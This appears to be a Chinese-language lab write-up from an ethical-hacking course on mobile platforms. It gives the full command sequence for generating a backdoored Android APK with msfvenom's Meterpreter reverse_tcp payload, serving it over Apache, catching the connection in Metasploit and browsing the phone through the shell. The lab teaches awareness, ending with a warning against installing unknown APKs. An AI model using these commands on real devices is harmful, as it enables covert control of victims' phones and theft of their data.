隨著Mobile技術的進步,移動性已成為Internet使用的一個關鍵特色。
人們的生活方式越來越依賴智能手機和平板電腦。手機使用者能夠存取
電子郵件、Internet和GPS導航,並儲存聯絡人清單、密碼、日曆和登入
密碼等資料。並在手機上進行各種交易(網路購物、銀行業務及證券交易)
Hacker會利用移動裝置的特性向個人發送格式錯誤的APK(應用程式封裝檔)
或URL,以誘使受害者點擊甚至安裝它們,進而授予攻擊者訪問用戶登録數據
的權限,或對其設備進行全部或部分控制。
接下來我們來談一下Hacking Mobile Platforms中的LAB
登入Parrot Security主機,並輸入sudo su切換身份
輸入cd切換目録

輸入以下指令service postgresql start啟動Postgresql DB

輸入以下指令建立一個藏有後門的Android APK(網路的APK不要亂裝)![]()
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk

將產生的Backdoor.apk複製到/root/Desktop/Backdoor.apk /var/www/html/share/目録
cp /root/Desktop/Backdoor.apk /var/www/html/share/
輸入指令service apache2 start啟動Apache服務

輸入指令msfconsole,再執行use exploit/multi/handler

輸入以下指令
set payload android/meterpreter/reverse_tcp
set LHOST 10.10.10.13
show options

輸入以下指令,執行exploit在背景執行
exploit -j -z
用Android手機到http://10.10.10.13/share 去下載Backdoor.apk

在手機安裝Backdoor.apk

我們在meterpreter後台可以看到手機安裝Backdoor.apk有連上來

輸入指令sessions -i 1,從Meterpreter shell可以看到Android手機的資訊

輸入ipconfig可以看到手機連上的IP資訊

輸入pwd可以看到手機的儲存設備路徑

看完以上LAB以後在網路上來路不明的APK請勿下載![]()